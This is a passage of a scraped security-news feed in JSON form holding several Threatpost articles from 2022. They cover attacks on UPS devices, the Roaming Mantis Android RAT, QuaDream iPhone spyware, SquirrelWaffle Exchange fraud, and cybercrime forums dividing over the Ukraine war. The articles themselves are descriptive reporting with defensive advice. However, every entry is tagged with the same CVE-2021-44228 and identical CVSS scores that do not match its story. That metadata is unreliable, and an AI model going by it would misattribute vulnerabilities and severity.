equipment, so the stakes are high.\n\nThat\u2019s according to the Cybersecurity and Infrastructure Security Agency (CISA) and the Department of Energy, which warned that malicious types are going after internet-connected versions of UPS via default usernames and passwords, mostly \u2013 though vulnerabilities, like the [TLStorm bugs disclosed earlier this month](<https://threatpost.com/zero-click-flaws-ups-critical-infratructure/178810/>) \u2013 are also in the attacker toolbox.\n\n\u201cIn recent years, UPS vendors have added an Internet of Things [IoT] capability, and UPSs are routinely attached to networks for power monitoring, routine maintenance and/or convenience,\u201d according to a [Tuesday alert](<https://www.cisa.gov/sites/default/files/publications/CISA-DOE_Insights-Mitigating_Vulnerabilities_Affecting_Uninterruptible_Power_Supply_Devices_Mar_29.pdf>) from CISA (PDF). \u201cLoads for UPSs can range from small (e.g., a few servers) to large (e.g., a building) to massive (e.g., a data center).\u201d\n\nIf attackers are able to remotely take over the devices, they can be used for a host of nefarious ends. For instance, bad actors can use them as a jumping-off point to breach a company\u2019s internal network and steal data. Or, in a grimmer scenario, they could be used to cut power for mission-critical appliances, equipment or services, which could cause physical injury in an industrial environment, or disrupt business services, leading to significant financial losses.\n\nFurther, cyberattackers could also execute remote code to alter the operation of the UPSs themselves, or physically damage them (or the devices connected to them).\n\n\u201cIt\u2019s easy to forget that every device connected to the internet is at increased risk of attack,\u201d Tim Erlin, vice president of strategy at Tripwire, noted via email. \u201cJust because a vendor provides the capability to put a device on the internet, doesn\u2019t mean that it\u2019s set up to be secure. It\u2019s up to each organization to ensure that the systems they deploy are configured securely.\u201d\n\n## **An Easy Fix**\n\nThus, those responsible for UPS upkeep (which CISA noted could include IT staff, building operations people, industrial maintenance workers or third-party contractors from monitoring services) have an easy fix for this one: Enumerating all connected UPSs and similar systems and simply take them offline.\n\nIf maintaining an active IoT connection is a requirement, admins should change the default credentials to a strong user-name-and-password combo \u2013 and preferably, implement multifactor authentication (MFA) too, CISA added. And other mitigations, according to CISA, include ensuring UPSs are behind a virtual private network (VPN), and adopting login timeout/lockout features so that the devices aren\u2019t continually online and open to the world.\n\n\u201cThe use of a default username and password to maliciously access a system isn\u2019t a new technique,\u201d said Erlin. \u201cIf you\u2019re responding to this advisory by updating the credentials for your UPS systems, take the follow-up step to ensure that other systems aren\u2019t using default credentials as well.\u201d\n\n_**Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-30T17:14:57", "type": "threatpost", "title": "Cyberattackers Target UPS Back-Up Power Devices in Mission-Critical Environments", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-30T17:14:57", "id": "THREATPOST:16877B149E701CC4DB69E91C567D79CC", "href": "https://threatpost.com/cyberattackers-ups-backup-power-critical-environments/179169/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "The Roaming Mantis Android malware campaign has buzzed into Europe, quickly infesting France in particular, where there have been 66,789 downloads of the group\u2019s specific remote access trojan (RAT) as of January.\n\nThe campaign pushes the Android RAT known as Wroba (aka Moqhao or XLoader) onto victim devices. According to research from Kaspersky, it has been updated with the ability to exfiltrate images and galleries from a victim device, which potentially paves the way for lifting sensitive information from things like drivers\u2019 licenses, abusing stored QR codes for payment services, or even for blackmail or sextortion.\n\nRoaming Mantis has been [on the move since 2018](<https://threatpost.com/roaming-mantis-swarms-globally-spawning-ios-phishing-cryptomining/132149/>), mostly observed in Japan, South Korea and Taiwan. Now, its arrival in France has resulted in that country seeing the highest volume of attacks worldwide, according to researchers at Kaspersky. There have also been detections in Germany.\n\n\u201cThe actor is focusing on expanding infection via smishing to users in Europe,\u201d Kaspersky researchers noted in a [Monday writeup](<https://securelist.com/roaming-mantis-reaches-europe/105596/>). \u201cThe campaign in France and Germany was so active that it came to the attention of the German police and French media.\u201d\n\nThe campaign typically spreads via \u201csmishing\u201d \u2013 i.e., SMS-based phishing, usually impersonating Google Chrome or a region-specific entity such as Yamato Transport in Japan.\n\n\u201cTypically, the smishing messages contain a very short description and a URL to a landing page,\u201d they explained. \u201cIf a user clicks on the link and opens the landing page, there are two scenarios: iOS users are redirected to a phishing page imitating the official Apple website, while the Wroba malware is downloaded on Android devices.\u201d\n\nThe Wroba RAT has a feature that checks the region of the infected device in order to display a phishing page in the corresponding language. In the past, it has checked for Asian regions, but Germany and France have been added as well, according to Kaspersky.\n\nInterestingly, researchers also found that for non-targeted regions, the landing page blocks the connection from the source IP address, so the user just receives a fake \u201c404\u201d error page.\n\n## **Recent Obfuscation Updates**\n\nThe criminal group behind Roaming Mantis has recently updated some of its other tactics and tools, including adding various obfuscation techniques to the proceedings in order to evade detection.\n\n\u201cFirst, the actor changed the programming language from Java to Kotlin, a programming language designed to interoperate fully with Java,\u201d researchers explained. \u201cThen\u2026the data structure of the embedded payload\u2026was also modified.\u201d\n\nThe first-stage payload, a loader that fetches Wroba, is now encased in a carapace of junk code, the researchers found. It\u2019s an .ELF file was embedded into the .APK file that\u2019s downloaded to the device. The .ELF file uses Java Native Interface (JNI) to install the second-stage payload, for decryption and also part of the loading feature, according to the researchers.\n\n\u201cThe loader function takes each section of data from the embedded data, except the junk data,\u201d they explained. \u201cThen, the encrypted payload is XORed using the embedded XOR key. After the XOR operation, as with previous samples, the data is decompressed using zlib to extract the payload, a Dalvik Executable (DEX) file.\u201d\n\nThe decrypted payload is then saved and executed to infect the malicious main module on victim devices.\n\n## **Stealing Images**\n\nAs for the Wroba backdoor itself, the RAT has received two new data-stealing commands: \u201cget_photo\u201d and \u201cget_gallery.\u201d This brings the total number of embedded backdoor commands to 21, according to Kaspersky.\n\n\u201cThese new backdoor commands are added to steal galleries and photos from infected devices,\u201d researchers noted. \u201cThis suggests the criminals have two aims in mind. One possible scenario is that the criminals steal details from such things as driver\u2019s licenses, health insurance cards or bank cards, to sign up for contracts with QR code payment services or mobile payment services. The criminals are also able to use stolen photos to get money in other ways, such as blackmail or sextortion.\u201d\n\nThey added, \u201cWe predict these attacks will continue in 2022 because of the strong financial motivation.\u201d\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T17:32:14", "type": "threatpost", "title": "Roaming Mantis Expands Android Backdoor to Europe", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T17:32:14", "id": "THREATPOST:19BDD881931703B28F7B93492E0C75FD", "href": "https://threatpost.com/roaming-mantis-android-backdoor-europe/178247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "ForcedEntry \u2013 the exploit of a zero-click iMessage zero day that [circumvented](<https://threatpost.com/pegasus-spyware-uses-iphone-zero-click-imessage-zero-day/168899/>) Apple\u2019s then-brand-new BlastDoor security feature starting a year ago \u2013 was picked apart not just by NSO Group with its Pegasus spyware but also by a newly uncovered, smaller smartphone-hacking toolmaker named QuaDream.\n\nReuters [published](<https://www.reuters.com/technology/exclusive-iphone-flaw-exploited-by-second-israeli-spy-firm-sources-2022-02-03/>) details on QuaDream last week. The outlet relied on input from five sources familiar with the matter, plus a look at two QuaDream product brochures dating from 2019 and 2020 that its reporters got their hands on.\n\nThree people familiar with the matter told Reuters that QuaDream and NSO Group have shared employees over the years. Two sources also said that QuaDream and NSO Group came up with the iPhone exploit techniques on their own, separately \u2014 as opposed to collaborating.\n\nIn September, Citizen Lab [published details about having captured](<https://citizenlab.ca/2021/09/forcedentry-nso-group-imessage-zero-click-exploit-captured-in-the-wild/>) NSO Group\u2019s ForcedEntry exploit in the wild, though its security researchers believe that it was first used in February 2021. Apple had just introduced BlastDoor, a structural improvement in iOS 14 meant to block message-based, zero-click exploits \u2013 a month prior to when NSO Group is believed to have started using it.\n\nMonths earlier, in August, the privacy watchdog identified nine Bahraini activists whose iPhones were hacked with NSO Group\u2019s Pegasus spyware between June 2020 and last February. Some of the activists were attacked with what Citizen Lab came to call the 2021 ForcedEntry exploit, while others\u2019 devices were remotely exploited and infected with spyware by [the 2020 KISMET exploit](<https://threatpost.com/zero-click-apple-zero-day-pegasus-spy-attack/162515/>): another zero-click iMessage exploit.\n\nBlastDoor was supposed to prevent this type of attack by acting as what Google Project Zero\u2019s Samuel Gro\u00df called at the time a \u201ctightly sandboxed\u201d service responsible for \u201calmost all\u201d of the parsing of untrusted data in iMessages. The ForcedEntry exploit managed to circumvent BlastDoor by targeting Apple\u2019s image rendering library: a sophisticated attack that was effective against Apple iOS, MacOS and WatchOS devices.\n\n## QuaDream Got in on the Fun\n\nQuaDream was allegedly in on the Bahraini malware infections, it turns out, including an attack on one living in London at the time.\n\nAccording to Reuters, the firm was founded in 2016 by Ilan Dabelstein, a former Israeli military official, and by two former NSO employees, Guy Geva and Nimrod Reznik. Reuters\u2019 sources for QuaDream\u2019s background were Israeli corporate records and two people familiar with the business.\n\nIts 2016 founding means that QuaDream has spent more than five years hacking iPhones and other iGadgets, prying them open so as to monitor calls and get access to users\u2019 microphones and cameras in real time. This type of powerful spyware gives its users access to their targets\u2019 email, photos, texts, contacts and instant messages, even in spite of what should be the end-to-end encryption promised by services such as WhatsApp, Telegram or Signal.\n\n## There\u2019s So Much Talent Out There, Unfortunately\n\nCitizen Lab security researcher Bill Marczak, who\u2019s been studying both companies\u2019 tools, told Reuters that the zero-click capability of QuaDream\u2019s flagship product \u2013 called REIGN \u2013 seems \u201con par\u201d with NSO\u2019s Pegasus spyware.\n\nAs Reuters noted, security researchers at Google\u2019s Project Zero have called ForcedEntry [\u201cone of the most technically sophisticated exploits\u201d](<https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html>) they\u2019ve ever captured: an estimation confirmed by Citizen Lab director Ronald Deibert.\n\nOn Monday, he pointed to Project Zero\u2019s \u201cvery thorough\u201d analysis of ForcedEntry as having demonstrated the level of engineering talent available to companies like NSO Group and others in the mercenary spyware marketplace.\n\n\u201cThat spyware can be engineered with such sophistication and stealth, and then abused widely to target broad cross sections of civil society, should give everyone serious pause,\u201d he told Threatpost via email.\n\n## Israeli Police Linked to Widespread Pegasus Spying\n\nA related piece of news emerged on Monday. According to a new [report](<https://www.calcalistech.com/ctech/articles/0,7340,L-3928830,00.html>) from the Israeli newspaper Calcalist, dozens of prominent Israelis have been hacked with Pegasus, including a son of former premier Benjamin Netanyahu, activists and senior government officials.\n\n\u201cCEOs of government ministries, journalists, tycoons, corporate executives, mayors, social activists and even the Prime Minister\u2019s relatives, all were police targets, having their phones hacked by NSO\u2019s spyware, prior to any investigation even opening and without any judicial authorization,\u201d Calcalist reported.\n\nPegasus was also recently found on the devices of Finland\u2019s diplomatic corps serving outside the country as part of a wide-ranging espionage campaign, Finnish officials [claimed](<https://threatpost.com/nso-group-pegasus-spyware-finnish-diplomats/178113/>). In December, Pegasus was also [reportedly](<https://threatpost.com/pegasus-spyware-state-department-iphones/176779/>) planted on the iPhones of at least nine U.S. State Department employees.\n\n## QuaDream: Less Known But Just as Powerful\n\nAccording to QuaDream\u2019s brochures for the REIGN \u201cPremium Collection,\u201d its malware tools offer similar capabilities as Pegasus, including \u201creal-time call recordings,\u201d \u201ccamera activation \u2013 front and back,\u201d and \u201cmicrophone activation,\u201d as Reuters reported.\n\nThe outlet\u2019s sources said that QuaDream and NSO Group share several buyers, including Saudi Arabia and Mexico, both of which are among the many governmental Pegasus buyers that have been accused of illegally using spyware to target political opponents. QuaDream\u2019s first clients also allegedly include the Singaporean government. As well, the firm apparently made a pitch to the Indonesian government, though Reuters couldn\u2019t determine whether Indonesia ponied up.\n\nIts prices appear to vary. According to the 2019 brochure, one offering that gave customers the ability to infect 50 devices per year was priced at $2.2 million, \u201cexclusive of maintenance costs,\u201d though two people familiar with REIGN\u2019s sales told Reuters that the price for REIGN \u201cwas typically higher.\u201d\n\n## How Vast *Is* the Spyware Market?\n\nKudos to Reuters for digging up details on QuaDream: not an easy task, given how murky the company is. It reportedly has no website, and employees have reportedly been told to stay mum about the company on their social-media posts.\n\nJohn Bambenek, principal threat hunter at digital IT and security operations company Netenrich, told Threatpost on Monday that discretion is the hallmark of spyware sellers. \u201cEvery intelligence agency worth their salt (or more accurately their budgets) are developing these kinds of exploits in house or via closely-associated companies who do not do business with many other countries,\u201d he said via email. \u201cChina, for instance, has done great work in mobile exploitation that seems to have been government performed effort. For every player we know about, there are dozens that are much more secretive.\u201d\n\nThe fact that there are more spyware-makers than just NSO Group is no shocker.\n\nThat was made clear in December by Meta, Facebook\u2019s parent company, which kicked six alleged spy-for-hire \u201ccyber-mercenaries\u201d [to the curb](<https://threatpost.com/facebook-bans-spy-hire/177149/>), along with a mysterious Chinese law-enforcement supplier. Meta accused the entities of collectively targeting about 50,000 people for surveillance, issued cease-and-desist warnings to six of the groups, and undertook the task of warning targeted people in more than 100 countries.\n\nMike Parkin, engineer at SaaS enterprise cyber-risk remediation firm Vulcan Cyber, told Threatpost that bleeding-edge attacks will continue to appear, given \u201can entire Dark-Web economy built around discovering exploits and selling them to the highest bidder, and state/state-sponsored actors having access to extraordinary financial and technical resources.\u201d\n\nThere are \u201calmost certainly\u201d exploits similar to ForcedEntry already being used in the wild, Parkin said: ones that haven\u2019t yet come to light \u201cbecause they are used sparingly and only against high-value targets.\u201d\n\n_**Check out our free **_[_**upcoming live and on-demand online town halls**_](<https://threatpost.com/category/webinars/>)_** \u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-07T18:49:59", "type": "threatpost", "title": "QuaDream, 2nd Israeli Spyware Firm, Weaponizes iPhone Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-07T18:49:59", "id": "THREATPOST:99C6C1555ACD07B4925765AED21A360C", "href": "https://threatpost.com/quadream-israeli-spyware-weaponized-iphone-bug/178252/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T22:38:10", "description": "[SquirrelWaffle](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) \u2013 the newish malware loader that[ first showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September \u2013 once again got its scrabbly little claws into an unpatched Microsoft Exchange server to spread malspam with its tried-and-true trick of [hijacking](<https://threatpost.com/ikea-email-reply-chain-attack/176625/>) email threads.\n\nThat\u2019s the same-old, same-old, as in, a SquirrelWaffle campaign will hijack an email thread to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent[ Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has operated.\n\nBut this time, the operators added a twist: They sucked knowledge out of an email thread and used it to trick the target into a money transfer.\n\nThey almost pulled it off. The targeted organization initiated a money transfer to an attacker-controlled account, but thankfully, one of the financial institutions involved in the transaction smelled a rat and flagged the deal as fraudulent.\n\nIn a Tuesday [post](<https://news.sophos.com/en-us/2022/02/15/vulnerable-exchange-server-hit-by-squirrelwaffle-and-financial-fraud/>), Sophos analysts Matthew Everts and Stephen McNally said that typically, in SquirrelWaffle attacks \u2013 which typically entail the threat actors walking through holes left by unpatched, notorious,[ oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>)[ ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and[ ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities \u2013 the attack ends when those holes finally get patched, removing the attacker\u2019s ability to send emails through the server.\n\nBut in this recent engagement, the Sophos Rapid Response team found that while a SquirrelWaffle malspam campaign was wreaking havoc on an unpatched server, that same vulnerable server was being used by the attackers to siphon off knowledge from a stolen email thread and to launch a financial fraud attack.\n\n\u201cThe combination of Squirrelwaffle, ProxyLogon, and ProxyShell has been encountered by the Sophos Rapid Response team multiple times in the last few months, but this is the first time we have seen attackers use typo-squatting to maintain the ability to send spam once the Exchange server has been remediated,\u201d the analysts wrote.\n\n## Too Late to Patch That Leaky Exchange Roof\n\nIn this case, patching Exchange wouldn\u2019t have clipped SquirrelWaffle\u2019s tail, the analysts said, given that the attackers had already spirited away an email thread about customer payments from the victim\u2019s Exchange server.\n\nBesides which, as the analysts noted and as Sophos [detailed](<https://news.sophos.com/en-us/2021/03/25/patching-alone-is-not-enough-investigate-your-exposure-windows/>) last March, patching isn\u2019t the end-all, be-all for remediating vulnerable Exchange servers. For one thing, you also need to determine whether attackers have pulled off any other mischief, such as installing webshells.\n\n## Typosquatting Their Way Into Inboxes\n\nThe double-up attack on the vulnerable Exchange server started with the attackers registering a [typosquat](<https://threatpost.com/malformed-url-prefix-phishing-attacks-spike-6000/164132/>) domain. In other words, they registered a domain name that resembled the victim\u2019s legitimate domain but with a small typo, then used email addresses from the look-alike domain to reply to the email thread.\n\n\u201cMoving the conversation out of the victim\u2019s email infrastructure gave the attackers operational control over what happened next,\u201d Everts and McNally explained.\n\nWhat happened next was that the attackers tried to divert the victim\u2019s customer\u2019s payments to accounts they controlled. In their hunt for legitimacy, they went so far as to copy more email addresses, to make it look like they were requesting support from an internal department. But these additional email addresses were just as bogus, being sent with the same almost, not-quite, look-alike typosquat domain.\n\nNext, they started using \u201cthis transaction\u2019s ready to go!\u201d language, as in the screen capture Sophos provided below.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163107/finance_dept_cc_ed.jpg>)\n\nSource: Sophos.\n\nNext came some foot-tappingly stern language to ratchet up the urgency, as shown in the next screen grab. \u201cI appreciate how busy you are,\u201d the crooks crooned, among other things that sounded like legitimate accounting blah-blah-blah, \u201cbut wondered if you could give me an update regarding the renewal?\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15163737/More_accounting-ese.jpg>)\n\nSource: Sophos.\n\nThe attackers\u2019 fake accountant faux-relaxed after the SquirrelWaffle operators received an email indicating that the illegitimate payment was being processed, assuring their mark that they\u2019d get them an invoice ASAP.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/15164119/kind_regards.jpg>)\n\nSource: Sophos.\n\n## How to Cage This Twitchy Rodent\n\nSophos offered advice on how to protect against malicious email attacks such as the SquirrelWaffle campaign, the first of which is a head-desk-bang-bang clich\u00e9: Namely, patch those servers.\n\n\u201cThe single biggest step defenders can take to prevent the compromise and abuse of on premises Microsoft Exchange servers is to ensure that they have been patched with the most recent updates from Microsoft,\u201d according to the post.\n\nAlso:\n\n * Implement industry standards for email authentication, such as SPF (Sender Policy Framework), DKIM (DomainKeys Identified Mail), and DMARC (Domain Message Authentication Reporting and Conformance, in order to make it easier for other organizations to figure out if emails are legitimate. \u201cUsing these standards can make it harder for an attacker to send spoofed emails impersonating your domain,\u201d Sophos said.\n * Consider email security products that integrate artificial intelligence to help fend off increasingly sophisticated social engineering attacks, phishing lures and impersonation messages.\n * Protect the recipients of such emails and ensure that users in your organization can spot phishing attempts and know how to report and respond to them.\n\nSophos also provided tips on what to do if your organization has already been attacked. In fact, it\u2019s put together a [Squirrelwaffle Incident Guide](<https://news.sophos.com/en-us/2022/02/15/rapid-response-the-squirrelwaffle-incident-guide/>) to help victims investigate, analyze and respond.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, focused on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. [REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-15T22:31:33", "type": "threatpost", "title": "SquirrelWaffle Adds a Twist of Fraud to Exchange Server Malspamming", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-15T22:31:33", "id": "THREATPOST:68B92CE2FE5B31FB78327BDD0AB7F21C", "href": "https://threatpost.com/squirrelwaffle-fraud-exchange-server-malspamming/178434/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-14T14:53:14", "description": "A rift has formed in the cybercrime underground: one that could strengthen, rather than cripple, the cyber-onslaught of ransomware.\n\nAccording to a report ([PDF](<https://acn-marketing-blog.accenture.com/wp-content/uploads/2022/03/UPDATED-ACTI-Global-Incident-Report-Ideological-Divide-Blog-14MARCH22.pdf>)) published Monday, ever since the outbreak of war in Ukraine, \u201cpreviously coexisting, financially motivated threat actors divided along ideological factions.\u201d\n\n\u201cPro-Ukrainian actors are refusing to sell, buy, or collaborate with Russian-aligned actors, and are increasingly attempting to target Russian entities in support of Ukraine,\u201d wrote researchers from Accenture\u2019s Cyber Threat Intelligence (ACTI). \u201cHowever, pro-Russian actors are increasingly aligning with hacktivist-like activity targeting \u2018enemies of Russia,\u2019 especially Western entities due to their claims of Western warmongering.\u201d\n\n## The Russia-Ukraine Cyber Warzone\n\nHistorically, the world\u2019s foremost cybercrime forums have been Russian language. These dark web marketplaces bring together a complex network of advanced persistent threat (APT) and ransomware groups, botmasters, and malware authors \u2013 a range of cybercriminals that includes even low-level carders, scammers and script kiddies.\n\nTogether, threat actors can [do more](<https://threatpost.com/inside-ransomware-economy/166471/>) than they otherwise could on their own. For example, botmasters offer access to already compromised devices, software developers improve the malware, and initial access brokers specialize in providing network access via backdoors or security vulnerability exploits for things like Remote Desktop Protocol (RDP).\n\nThis productivity is underpinned by not only a shared language, but a shared cultural and political alignment. As ACTI noted in its report, \u201cthese forums previously employed a strict, \u2018no work in CIS\u2019 policy.\u201d The CIS \u2013 Commonwealth of Independent States \u2013 is a post-Soviet conglomeration of Russia and central Asian states.\n\nWith the outbreak of war, however, this harmony is fracturing.\n\nOne poll, published to a cross-site scripting (XSS) forum on March 2, posed the question: \u201cAre you against work on RU and CIS?\u201d 82.6 percent of respondents responded \u201cYes,\u201d but, a surprisingly large minority \u2013 17.4 percent \u2013 responded \u201cNo.\u201d\n\n## No Love For Moscow\n\nOn Feb. 27, an admin from RaidForums \u2013 an online marketplace for trafficking data from high-profile database leaks \u2013 published a statement titled \u201cRAIDFORUMS SANCTIONS ON RUSSIA.\u201d\n\n> ANY USER FOUND TO BE CONNECTING FROM RUSSIA WILL BE BANNED! THIS IS NOT A JOKE, WE DO NOT SUPPORT THE KREMLIN.\n\nShortly after the statement was published, RaidForums\u2019 main server was taken down by unknown enemies. It remained down as of March 4, according to ACTI.\n\nThe same is true in the opposite direction. The conflict \u201chas led some actors to exclusively sell their services, such as network accesses, to pro-Russian actors,\u201d researchers wrote, and inspired increased attacks against Western targets.\n\n## How This Will Hurt the West\n\nIt might appear, at first glance, that civil war in the cyber underground is a good thing. After all, if they\u2019re fighting each other they won\u2019t have time to annoy the rest of us, right?\n\nIn fact, the exact opposite is true.\n\n\u201cThe primary effect of this political divide so far,\u201d the researchers observed, \u201cis an increased and prolonged threat from underground actors aimed at Western targets, owed to the galvanization of pro-Russian actors and their targeted efforts that focus on \u2018enemies of Russia.'\u201d\n\nNationalist fervor is even motivating cybercriminals to open their arms and welcome previously shunned ransomware groups.\n\nIn response to the [Colonial Pipeline](<https://threatpost.com/colonial-pays-5m/166147/>) attack last May, Western governments and law enforcement began cracking down harder than ever on ransomware groups. In response \u2013 to avoid getting the stink on them, too \u2013 underground admins banned those groups.\n\n\u201cWhile ransomware actors did not disappear from the underground,\u201d wrote the researchers, \u201cthe ban did make it harder for them to acquire tools, recruit affiliates, or gain exploits or accesses, thereby reducing ransomware actors\u2019 abilities to scale their operations.\u201d\n\nNow, \u201cmany underground actors call for the return of ransomware groups to the mainstream underground.\u201d\n\nThe consequence of bringing ransomware groups back into the fold \u201cwould not only enable those actors to target Western organizations more efficiently but also embolden them, as other underground actors would likely herald ransomware actors\u2019 return and give those ransomware actors perceived moral reason to conduct attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. \u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in 